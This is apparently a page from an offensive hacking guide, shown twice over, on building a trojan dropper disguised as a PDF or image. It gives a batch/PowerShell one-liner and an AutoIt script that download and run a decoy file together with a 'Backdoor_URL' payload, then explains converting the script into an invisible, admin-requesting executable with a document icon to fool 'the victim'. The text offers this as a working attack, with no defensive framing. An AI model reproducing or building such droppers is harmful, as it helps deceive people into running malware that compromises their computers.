Embedding malicious files in Images or PDF

Embedding Files using batch (First Method)

@echo off

set files='pdf/image_url','url_of_our_evil_file/Backdoor_URL'

powershell "(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"

Using the following batch script following by the URL's order and delivering to the victim we will see that when the victim opens this file, the pdf/image will pop up first and the evil program will be executed after.

Embedding Files using Autoit (Second Method)

#include <StaticConstants.au3>
#include <WindowsConstants.au3>

Local $urls = "image_URL,Backdoor_URL"

Local $urlsArray = StringSplit($urls, ",", 2 )

For $url In $urlsArray
	$sFile = _DownloadFile($url)
	shellExecute($sFile)

Next

Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_GetURLImage

Use this script and add all the malicious links you want.

Once this its compile, when the victims execute the file, it will execute at the same time all the files.
This does the same that the first method does but without using batch and uploading straight the icon of the program in the autoit program.

Converting Bat to exe

Installation

Use wine to execute the program in Linux, you can use it in windows as well.

sudo apt update
sudo apt upgrade
git clone https://github.com/tokyoneon/B2E
cd B2E
unzip Bat_To_Exe_Converter.zip
wine  Bat_To_Exe_Converter_\(Installer\).exe

Usage

Always select one of the invisible options (Windows 64 bits invisible).
You can click on Requests Administrator privileges to get access with admin privileges.
The Icon option lets you set an Icon to your evil file like pdf, word, etc.

PreviousCreating Trojans NextChanging Trojans Icon

Last updated 2 years ago

Embedding malicious files in Images or PDF

Embedding Files using batch (First Method)

@echo off

set files='pdf/image_url','url_of_our_evil_file/Backdoor_URL'

powershell "(%files%)|foreach{$fileName='%TEMP%'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"

Using the following batch script following by the URL's order and delivering to the victim we will see that when the victim opens this file, the pdf/image will pop up first and the evil program will be executed after.

Embedding Files using Autoit (Second Method)

#include <StaticConstants.au3>
#include <WindowsConstants.au3>

Local $urls = "image_URL,Backdoor_URL"

Local $urlsArray = StringSplit($urls, ",", 2 )

For $url In $urlsArray
	$sFile = _DownloadFile($url)
	shellExecute($sFile)

Next

Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_GetURLImage

Use this script and add all the malicious links you want.

Once this its compile, when the victims execute the file, it will execute at the same time all the files.
This does the same that the first method does but without using batch and uploading straight the icon of the program in the autoit program.

Converting Bat to exe

Installation

Use wine to execute the program in Linux, you can use it in windows as well.

sudo apt update
sudo apt upgrade
git clone https://github.com/tokyoneon/B2E
cd B2E
unzip Bat_To_Exe_Converter.zip
wine  Bat_To_Exe_Converter_\(Installer\).exe

Usage

Always select one of the invisible options (Windows 64 bits invisible).
You can click on Requests Administrator privileges to get access with admin privileges.
The Icon option lets you set an Icon to your evil file like pdf, word, etc.

B2E/Bat_To_Exe_Converter.zip at master · tokyoneon/B2EGitHub

PreviousCreating Trojans NextChanging Trojans Icon

Last updated 2 years ago